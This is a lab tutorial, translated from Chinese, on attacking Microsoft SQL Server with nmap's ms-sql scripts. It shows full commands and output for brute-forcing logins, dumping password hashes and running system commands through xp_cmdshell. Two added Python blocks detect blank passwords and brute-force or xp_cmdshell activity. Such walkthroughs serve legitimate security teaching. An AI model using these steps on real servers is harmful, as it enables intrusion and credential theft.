
Penetration Testing MSSQL with Nmap

Author: 資陽花街

Using nmap scripts to penetration-test MS SQL Server and obtain the target's user names, database tables and other information.

# Preparation

Attacking machine: Kali (with nmap installed)

Target machine: Windows Server 2019 (with SQL Server 2016 installed)

nmap ships with a set of scripts for testing; the ones for MSSQL can be listed with the following command:

$ locate *.nse | grep ms-sql
/usr/share/nmap/scripts/broadcast-ms-sql-discover.nse
/usr/share/nmap/scripts/ms-sql-brute.nse
/usr/share/nmap/scripts/ms-sql-config.nse
/usr/share/nmap/scripts/ms-sql-dac.nse
/usr/share/nmap/scripts/ms-sql-dump-hashes.nse
/usr/share/nmap/scripts/ms-sql-empty-password.nse
/usr/share/nmap/scripts/ms-sql-hasdbaccess.nse
/usr/share/nmap/scripts/ms-sql-info.nse
/usr/share/nmap/scripts/ms-sql-ntlm-info.nse
/usr/share/nmap/scripts/ms-sql-query.nse
/usr/share/nmap/scripts/ms-sql-tables.nse
/usr/share/nmap/scripts/ms-sql-xp-cmdshell.nse
           

# Obtaining database version information

Use the ms-sql-info script to obtain the target database's version and related information.

nmap -p 1433 -Pn --script ms-sql-info 192.168.91.133
// -p specifies the port; -Pn skips host discovery; --script specifies the script to run

The information retrieved is shown in a screenshot in the original post (image not reproduced here).

# Brute-forcing user credentials

The ms-sql-brute script enumerates and brute-forces database user names and passwords.

nmap -p 1433 -Pn --script ms-sql-brute --script-args userdb=mssql_user.txt,passdb=mssql_pass.txt 192.168.91.133
// --script-args passes script arguments; userdb= specifies the user-name wordlist; passdb= specifies the password wordlist

The result is shown in a screenshot in the original post (image not reproduced here).

User names and passwords obtained:

sa:Password@123
pentest:123456
           

# Executing SQL statements

With the credentials obtained above, nmap's ms-sql-query script can be used to execute SQL queries on the target.

Usage:

nmap -p1433 -Pn --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-query.query="<SQL query>" 192.168.91.133
           

List all databases on the target:

nmap -p1433 -Pn --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-query.query="sp_databases" 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 01:57 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00051s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-query: 
|   [192.168.91.133:1433]
|     Query: sp_databases
|       DATABASE_NAME	DATABASE_SIZE	REMARKS
|       =============	=============	=======
|       master	7552	Null
|       model	16384	Null
|       msdb	21888	Null
|_      tempdb	16384	Null

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds

           

# NetBIOS information gathering

Use the ms-sql-ntlm-info script to collect NetBIOS information from a remote SQL Server host that has NTLM authentication enabled.

How it works: sending an MS-TDS NTLM authentication request with an invalid domain and null credentials causes the remote service to respond with an NTLMSSP message, and that message discloses the NetBIOS name, DNS name and operating system version.

nmap -p1433 -Pn --script ms-sql-ntlm-info 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:08 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00053s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-ntlm-info: 
|   Target_Name: WIN-8EIGFF6H8PR
|   NetBIOS_Domain_Name: WIN-8EIGFF6H8PR
|   NetBIOS_Computer_Name: WIN-8EIGFF6H8PR
|   DNS_Domain_Name: WIN-8EIGFF6H8PR
|   DNS_Computer_Name: WIN-8EIGFF6H8PR
|_  Product_Version: 10.0.17763
           

# Dumping MSSQL password hashes

The ms-sql-dump-hashes script dumps the MSSQL password hashes, which can be handed to tools such as John the Ripper.

nmap -p 1433 -Pn --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:22 EDT
Nmap scan report for 192.168.91.133
Host is up (0.0011s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-dump-hashes: 
| [192.168.91.133:1433]
|     sa:0x02002df771b8ffe860cb75e4bea87df48dd2fc38c35566eed3bf636aa962b2a24768387120df74d775627ea8ab10cd2339b525706fa0f68cbdff4580fcfddef2cb98493cce87
|     ##MS_PolicyEventProcessingLogin##:0x02001be8e4066350f72d7043e3b6fe080efb16a0cf424a4a1f078d84509d013946acaf49c08fdb534044432e474422769e4d43baa399bb094aa532e1333f6ec9c4eb01b4120c
|     ##MS_PolicyTsqlExecutionLogin##:0x02002f2e008251ee080daa07829e49ef4baf8624e26bc34a37096691751f83b4d7122f8bf1015db9ba5a519f483da5d366712c0fc54f8250ae8ce38db43e8e9f616cd0faab97
|_    pentest:0x020025bc596aaf94a1f764ccaca6cd6d0615cfba0f01140879c21df33959e492254ef66d53ddbfb0c961e3f04bfb376294d7194fcd61b0b6b85b06387d6f975b92a779544ab6

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
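As an added defender-side example (not code from the original post), the parser below splits each login:hash line from the dump above into its version, salt and digest, flags logins still on the legacy 0x0100 SHA-1 format, and performs the same blank-password check as T-SQL PWDCOMPARE(''). It assumes the documented SQL Server hash layout (2-byte version, 4-byte salt, then the hash of UTF-16LE(password) followed by the salt); the demo_blank login and its salt are constructed.

```python
import hashlib
from dataclasses import dataclass

# Sample input: two login:hash lines copied from the ms-sql-dump-hashes output
# above, plus one constructed line showing a login created with a blank password.
DUMP_LINES = [
    "sa:0x02002df771b8ffe860cb75e4bea87df48dd2fc38c35566eed3bf636aa962b2a24768387120df74d775627ea8ab10cd2339b525706fa0f68cbdff4580fcfddef2cb98493cce87",
    "pentest:0x020025bc596aaf94a1f764ccaca6cd6d0615cfba0f01140879c21df33959e492254ef66d53ddbfb0c961e3f04bfb376294d7194fcd61b0b6b85b06387d6f975b92a779544ab6",
]
_DEMO_SALT = bytes.fromhex("0a0b0c0d")  # constructed salt for the demo login
DEMO_BLANK_LINE = "demo_blank:0x0200" + _DEMO_SALT.hex() + hashlib.sha512(_DEMO_SALT).hexdigest()


@dataclass
class MssqlHash:
    login: str
    version: int   # 0x0100 = legacy SHA-1 format (SQL 2000-2008 R2), 0x0200 = SHA-512 (SQL 2012+)
    salt: bytes    # 4 random bytes
    digest: bytes  # hash(UTF-16LE(password) + salt)


def parse_dump_line(line: str) -> MssqlHash:
    """Split a 'login:0x<hex>' line into its version, salt and digest fields."""
    login, sep, hexstr = line.strip().partition(":")
    if not sep or not hexstr.lower().startswith("0x"):
        raise ValueError(f"not a hash line: {line!r}")
    raw = bytes.fromhex(hexstr[2:])
    version = int.from_bytes(raw[:2], "big")
    if version not in (0x0100, 0x0200):
        raise ValueError(f"{login}: unknown hash version 0x{version:04x}")
    if version == 0x0200 and len(raw) != 2 + 4 + 64:
        raise ValueError(f"{login}: SHA-512 hash should be 70 bytes, got {len(raw)}")
    return MssqlHash(login, version, raw[2:6], raw[6:])


def has_empty_password(h: MssqlHash) -> bool:
    """Same check as T-SQL PWDCOMPARE('', password_hash): with an empty password
    the stored digest is simply the hash of the salt alone."""
    algo = hashlib.sha512 if h.version == 0x0200 else hashlib.sha1
    return h.digest[: algo().digest_size] == algo(h.salt).digest()


def audit(lines):
    """Flag logins a defender should act on: blank passwords and legacy hashes."""
    findings = []
    for line in lines:
        h = parse_dump_line(line)
        if has_empty_password(h):
            findings.append((h.login, "empty password"))
        if h.version == 0x0100:
            findings.append((h.login, "legacy SHA-1 hash, password predates the SQL 2012 format and should be rotated"))
    return findings
```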

           

# Command execution

xp_cmdshell is a Microsoft SQL Server feature that lets system administrators execute operating-system commands. It is disabled by default. If xp_cmdshell is enabled on the target server, the ms-sql-xp-cmdshell script can be used to execute system commands on the target machine.

nmap -p1433 -Pn --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.91.133

// ms-sql-xp-cmdshell.cmd= specifies the command to execute

Nmap prints non-ASCII bytes in script output as \x escapes; the sequences in the output below are the UTF-8 bytes of the Chinese-locale labels that ipconfig prints (for example, \xE9\x85\x8D\xE7\xBD\xAE is 配置, "configuration").
nmap -p1433 -Pn --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:28 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00047s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-xp-cmdshell: 
|   [192.168.91.133:1433]
|     Command: ipconfig
|       output
|       ======
|       Null
|       Windows IP \xE9\x85\x8D\xE7\xBD\xAE
|       Null
|       Null
|       \xE4\xBB\xA5\xE5\xA4\xAA\xE7\xBD\x91\xE9\x80\x82\xE9\x85\x8D\xE5\x99\xA8 Ethernet0:
|       Null
|          \xE8\xBF\x9E\xE6\x8E\xA5\xE7\x89\xB9\xE5\xAE\x9A\xE7\x9A\x84 DNS \xE5\x90\x8E\xE7\xBC\x80 . . . . . . . : localdomain
|          \xE6\x9C\xAC\xE5\x9C\xB0\xE9\x93\xBE\xE6\x8E\xA5 IPv6 \xE5\x9C\xB0\xE5\x9D\x80. . . . . . . . : fe80::c0cf:a5e8:ba66:9b8d%6
|          IPv4 \xE5\x9C\xB0\xE5\x9D\x80 . . . . . . . . . . . . : 192.168.91.133
|          \xE5\xAD\x90\xE7\xBD\x91\xE6\x8E\xA9\xE7\xA0\x81  . . . . . . . . . . . . : 255.255.255.0
|          \xE9\xBB\x98\xE8\xAE\xA4\xE7\xBD\x91\xE5\x85\xB3. . . . . . . . . . . . . : 192.168.91.2
|_      Null
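Covering both the credential brute-force section and this xp_cmdshell section, here is an added detection example (not from the original post) that runs over a constructed SQL Server ERRORLOG excerpt: it reports client addresses with a burst of error 18456 logon failures, and any sp_configure change that switches on xp_cmdshell or a similarly risky option (SQL Server writes such changes to the error log). The log lines, IP addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample ERRORLOG excerpt (not from the original post), in the
# format SQL Server uses for error 18456 logon failures and sp_configure changes.
ERRORLOG = """\
2021-10-11 01:57:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.91.128]
2021-10-11 01:57:01.20 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.91.128]
2021-10-11 01:57:01.30 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 192.168.91.128]
2021-10-11 01:57:01.40 Logon       Login failed for user 'pentest'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.91.128]
2021-10-11 01:57:01.50 Logon       Login failed for user 'pentest'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.91.128]
2021-10-11 01:58:10.00 Logon       Login failed for user 'app_user'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.15]
2021-10-11 02:28:05.00 spid57      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-10-11 02:28:05.10 spid57      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

FAILED_RE = re.compile(r"^(?P<ts>\S+ \S+) Logon\s+Login failed for user '(?P<user>[^']*)'"
                       r".*\[CLIENT: (?P<client>[^\]]+)\]")
CONFIG_RE = re.compile(r"^(?P<ts>\S+ \S+) spid\d+\s+Configuration option '(?P<opt>[^']+)'"
                       r" changed from (?P<old>\d+) to (?P<new>\d+)")

def failed_login_bursts(log, threshold=5, window=timedelta(minutes=1)):
    """Per client IP, the largest number of failed logins inside any sliding
    `window`; clients at or above `threshold` are returned with the user names tried."""
    events = defaultdict(list)
    for line in log.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events[m["client"]].append((ts, m["user"]))
    bursts = {}
    for client, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:  # slide the window start forward
                start += 1
            count = end - start + 1
            if count >= threshold and count > bursts.get(client, (0, set()))[0]:
                bursts[client] = (count, {u for _, u in evs[start:end + 1]})
    return bursts

WATCHED_OPTIONS = ("xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries")

def dangerous_config_changes(log, watched=WATCHED_OPTIONS):
    """(timestamp, option) for each watched sp_configure option switched from 0 to non-zero."""
    return [(m["ts"], m["opt"]) for m in map(CONFIG_RE.match, log.splitlines())
            if m and m["opt"] in watched and m["old"] == "0" and m["new"] != "0"]
```

The same two checks can be pointed at a live instance by reading the log through xp_readerrorlog or by forwarding the ERRORLOG to a SIEM; the 'show advanced options' line is matched by the pattern but filtered out because it is not on the watched list.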
           

# Empty-password login test

If the administrator sets the password to empty, an attacker can log in to the database directly.


The ms-sql-empty-password script tests whether the target SQL Server accepts a login with an empty password.

nmap -p1433 -Pn --script ms-sql-empty-password 192.168.91.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:36 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00056s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-empty-password: 
|   [192.168.91.133:1433]
|_    sa:<empty> => Login Success

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
           

# Viewing database tables

The ms-sql-tables script lists the target's database tables.

Tip: by default the MSSQL instance has no user database; create a database and insert a table first, otherwise the script below reports an error.

nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
           
nmap -p1433 -Pn --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 04:28 EDT
Nmap scan report for 192.168.91.133
Host is up (0.00079s latency).

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-tables: 
|   [192.168.91.133:1433]
|       pentest
|         table	column	type	length
|         =====	======	====	======
|         Table_1	password	nchar	40
|         Table_1	username	nchar	40
|       
|       Restrictions
|         Output restricted to 2 tables (see ms-sql-tables.maxtables)
|         Output restricted to 5 databases (see ms-sql-tables.maxdb)
|_        No filter (see ms-sql-tables.keywords)

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
           
